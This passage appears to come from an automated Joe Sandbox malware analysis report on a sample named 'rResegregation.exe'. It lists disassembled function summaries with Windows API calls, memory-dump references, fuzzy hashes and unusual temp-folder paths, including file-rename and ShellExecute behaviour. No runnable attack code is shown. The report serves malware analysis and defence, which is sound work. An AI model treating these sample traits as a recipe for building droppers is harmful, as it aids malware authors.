                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre
                                                                  • API String ID: 123533781-2936765130
                                                                  • Opcode ID: 242605dd3021b9dd3d625f3e37deec10c9ff713f063c09ff5835f8ca8ab74a70
                                                                  • Instruction ID: 14d4926e91d078e82bebccc5f6ab74bc99395aff19d04a9878b07c190defc42e
                                                                  • Opcode Fuzzy Hash: 242605dd3021b9dd3d625f3e37deec10c9ff713f063c09ff5835f8ca8ab74a70
                                                                  • Instruction Fuzzy Hash: 9D513871A00208BFDB10DFA4C988A9DBBB5FF48318F20856AF515EB2D1DB799941CB54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: FileFindFirst
                                                                  • String ID:
                                                                  • API String ID: 1974802433-0
                                                                  • Opcode ID: caea3b9b5083208269277406012316af798426384357970767d8f37829e133fd
                                                                  • Instruction ID: 693c9160ce4d260d62fecbf2f45a0834f3a8ccba4a644e55fc62545b2e120305
                                                                  • Opcode Fuzzy Hash: caea3b9b5083208269277406012316af798426384357970767d8f37829e133fd
                                                                  • Instruction Fuzzy Hash: F9F0A0335081509FE701E7B49949AEEB778EF61324F60457BF241B21C1D7B84A84AA3A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040403A Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205windowstringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040C5
                                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 004040D9
                                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004040F7
                                                                  • GetSysColor.USER32(?), ref: 00404108
                                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404117
                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404126
                                                                  • lstrlenA.KERNEL32(?), ref: 00404129
                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404138
                                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040414D
                                                                  • GetDlgItem.USER32(?,0000040A), ref: 004041AF
                                                                  • SendMessageA.USER32(00000000), ref: 004041B2
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004041DD
                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040421D
                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0040422C
                                                                  • SetCursor.USER32(00000000), ref: 00404235
                                                                  • ShellExecuteA.SHELL32(0000070B,open,007A0EE0,00000000,00000000,00000001), ref: 00404248
                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404255
                                                                  • SetCursor.USER32(00000000), ref: 00404258
                                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404284
                                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404298
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                  • String ID: Call$N$open
                                                                  • API String ID: 3615053054-2563687911
                                                                  • Opcode ID: ffa70ba6b414771cfedee8d2664e4b0672246e5e1ae3d005f3366e5b10bf2318
                                                                  • Instruction ID: 325d301b2710361d9817967eb08788495a0e15e312a989604f50e6602a626d4c
                                                                  • Opcode Fuzzy Hash: ffa70ba6b414771cfedee8d2664e4b0672246e5e1ae3d005f3366e5b10bf2318
                                                                  • Instruction Fuzzy Hash: 9161C671A40209BFEB109F60DC45F6A7B69FB84744F10816AFB05BA2D1C7BCA951CF98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                  • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                  • DrawTextA.USER32(00000000,Bortdmmer Setup,000000FF,00000010,00000820), ref: 00401156
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: Bortdmmer Setup$F
                                                                  • API String ID: 941294808-2032987969
                                                                  • Opcode ID: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                                  • Instruction ID: 5377a76c68583d826c01589a66ce84b6d9bb3dc06a218cd9f98f6b2c798b1645
                                                                  • Opcode Fuzzy Hash: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                                  • Instruction Fuzzy Hash: 74419C71804249AFCB058FA5CD459BFBFB9FF45310F00812AF961AA1A0C738EA50DFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405A55 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrcpyA.KERNEL32(007A02D0,NUL,?,00000000,?,00000000,00405BE8,?,?), ref: 00405A64
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405BE8,?,?), ref: 00405A88
                                                                  • GetShortPathNameA.KERNEL32(?,007A02D0,00000400), ref: 00405A91
                                                                    • Part of subcall function 004058E4: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058F4
                                                                    • Part of subcall function 004058E4: lstrlenA.KERNEL32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405926
                                                                  • GetShortPathNameA.KERNEL32(007A06D0,007A06D0,00000400), ref: 00405AAE
                                                                  • wsprintfA.USER32 ref: 00405ACC
                                                                  • GetFileSize.KERNEL32(00000000,00000000,007A06D0,C0000000,00000004,007A06D0,?,?,?,?,?), ref: 00405B07
                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B16
                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B4E
                                                                  • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0079FED0,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BA4
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405BB5
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BBC
                                                                    • Part of subcall function 0040597F: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\rResegregation.exe,80000000,00000003), ref: 00405983
                                                                    • Part of subcall function 0040597F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                  • String ID: %s=%s$NUL$[Rename]
                                                                  • API String ID: 222337774-4148678300
                                                                  • Opcode ID: a98d0c62792372129b5cc65dd148cc0d3d8b8a17ed91fd97a1a79d4ea906e530
                                                                  • Instruction ID: 28628270b370f13d709f2e98436788b9d19fd6dde28ce54c0a079e884eb7da61
                                                                  • Opcode Fuzzy Hash: a98d0c62792372129b5cc65dd148cc0d3d8b8a17ed91fd97a1a79d4ea906e530
                                                                  • Instruction Fuzzy Hash: 5A311371605B18ABD6206B215C89F6B3A6CDF45764F14013BFE01F22D2DA7CBC008EAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405F77 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\rResegregation.exe",76483410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FCF
                                                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405FDC
                                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\rResegregation.exe",76483410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FE1
                                                                  • CharPrevA.USER32(?,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FF1
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F78
                                                                  • "C:\Users\user\Desktop\rResegregation.exe", xrefs: 00405FB3
                                                                  • *?|<>/":, xrefs: 00405FBF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Char$Next$Prev
                                                                  • String ID: "C:\Users\user\Desktop\rResegregation.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 589700163-1087672714
                                                                  • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                  • Instruction ID: e323e08bdfda0f150b574f83967a69ba6361760ee6a09b3ffc5edc4c10c5e242
                                                                  • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                  • Instruction Fuzzy Hash: 01118F91808B926EFB3216244C44B7BAF898B577A4F18007BE5C5722C2DA7C5C429B6E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00403F58 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000EB), ref: 00403F75
                                                                  • GetSysColor.USER32(00000000), ref: 00403F91
                                                                  • SetTextColor.GDI32(?,00000000), ref: 00403F9D
                                                                  • SetBkMode.GDI32(?,?), ref: 00403FA9
                                                                  • GetSysColor.USER32(?), ref: 00403FBC
                                                                  • SetBkColor.GDI32(?,?), ref: 00403FCC
                                                                  • DeleteObject.GDI32(?), ref: 00403FE6
                                                                  • CreateBrushIndirect.GDI32(?), ref: 00403FF0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                  • String ID:
                                                                  • API String ID: 2320649405-0
                                                                  • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                  • Instruction ID: 03c35b03fdde5f33accd48f8e357bf0732577442a8f103693b6bf1e6191b16fb
                                                                  • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                  • Instruction Fuzzy Hash: 71216271904705ABCB219F68ED48B4BBFF8AF01715B04892AF996A22E0D734EA04CB55
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                    • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                  • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28770977477.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                  • Associated: 00000000.00000002.28770951337.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28771003199.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28771028957.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_10000000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                  • String ID:
                                                                  • API String ID: 3730416702-0
                                                                  • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                  • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                                  • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                  • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                  • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                  • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28770977477.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                  • Associated: 00000000.00000002.28770951337.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28771003199.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28771028957.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_10000000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 1780285237-0
                                                                  • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                  • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                  • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                  • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004047F0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040480B
                                                                  • GetMessagePos.USER32 ref: 00404813
                                                                  • ScreenToClient.USER32(?,?), ref: 0040482D
                                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 0040483F
                                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404865
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
